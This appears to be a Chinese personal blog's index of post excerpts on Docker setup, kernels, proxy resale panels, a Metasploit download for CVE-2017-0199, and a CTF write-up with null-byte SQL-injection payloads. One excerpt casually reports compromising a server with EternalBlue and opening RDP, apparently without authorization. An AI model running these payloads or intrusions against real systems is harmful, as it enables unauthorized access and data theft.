搭建 Huginn

Docker 与 Daocloud

安装 Docker。

curl -sSL https://get.daocloud.io/docker | sh

或者可以通过包管理安装，就是版本可能会旧一点。

sudo apt install docker.io

Read More

拿服务器

NSA 的系列漏洞爆出来时就通过 EternalBlue 拿了服务器，开了 3389，不过当时没能拿到正方加密的 Key，就放在那没动过了。

Read More

之前用的 Cmder 在 win10 更新后出现了一些 奇奇怪怪的问题，很长时间没有能够解决，试用了下 ConEmu，发现已经解决了，于是转战 ConEmu。

Git

下载地址

这没什么好说的，基本是必备的了。

Read More

更换合适的内核

Ubuntu 16.04 只有一个合适的内核 4.4.0-47。

apt install linux-headers-4.4.0-47-generic linux-image-4.4.0-47-generic

Read More

最近做仿真的时候需要施加一个简谐力，就这么一个简单的需求，网上找了半天居然没找到合适的。。。

Read More

之前的 ss-bash 虽然也挺好用，也很轻量，但不方便搞端口转发，也不适合我继续当奸商，所以就顺手花了一晚上搭了原版的 sspanel，用了两天，也在校内小小推广了一波，发现这个系统不支持支付接入，无奈又换用 sspanel 魔改版，断断续续折腾了两天，结果悲剧的发现魔改版是支持支付接入，但是。。。个人账户必须调用第三方免签约的服务，而这些服务。。。算了。。。我的事业还没开始呢。。。

网上所有的魔改版的教程都过时了，作者新添加了一些功能，导致以前的方法不对，写一写我自己踩的坑吧。

Read More

收到律师函，立即删除该侵权文章。

Read More

0x01 通过Metasploit

参考链接

准备

更新 MSF 到最新。

下载对应 Exploit

cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/modules/exploits/windows/fileformat/office_word_hta.rb

Read More

simplesqlin

名字就能看出来是注入了，然而 select 被过滤，百般尝试后发现插入 %00 后可以绕过。

http://202.120.7.203/index.php?id=-1 union sele%00ct 1,database(),user()
http://202.120.7.203/index.php?id=-1 union sele%00ct 1,database(),group_concat(table_name) fr%00om information_schema.tables wher%00e table_schema=database()
http://202.120.7.203/index.php?id=-1 union sele%00ct 1,database(),group_concat(column_name) fr%00om information_schema.columns wher%00e table_schema=database() and table_name=0x666c6167
http://202.120.7.203/index.php?id=-1 union sele%00ct 1,database(),flag fr%00om flag

数据库是 news，表有 flag，news。

Read More

由于生活的窘困，合租了一台服务器开了多个端口提供 ss 服务，懒得配置 ss-panel，就使用了 ss-bash 来监控不同端口的流量，但每次都要等上服务器才能看到流量使用情况，很麻烦，于是就写了个简单的页面来提供 WEB 访问。

Read More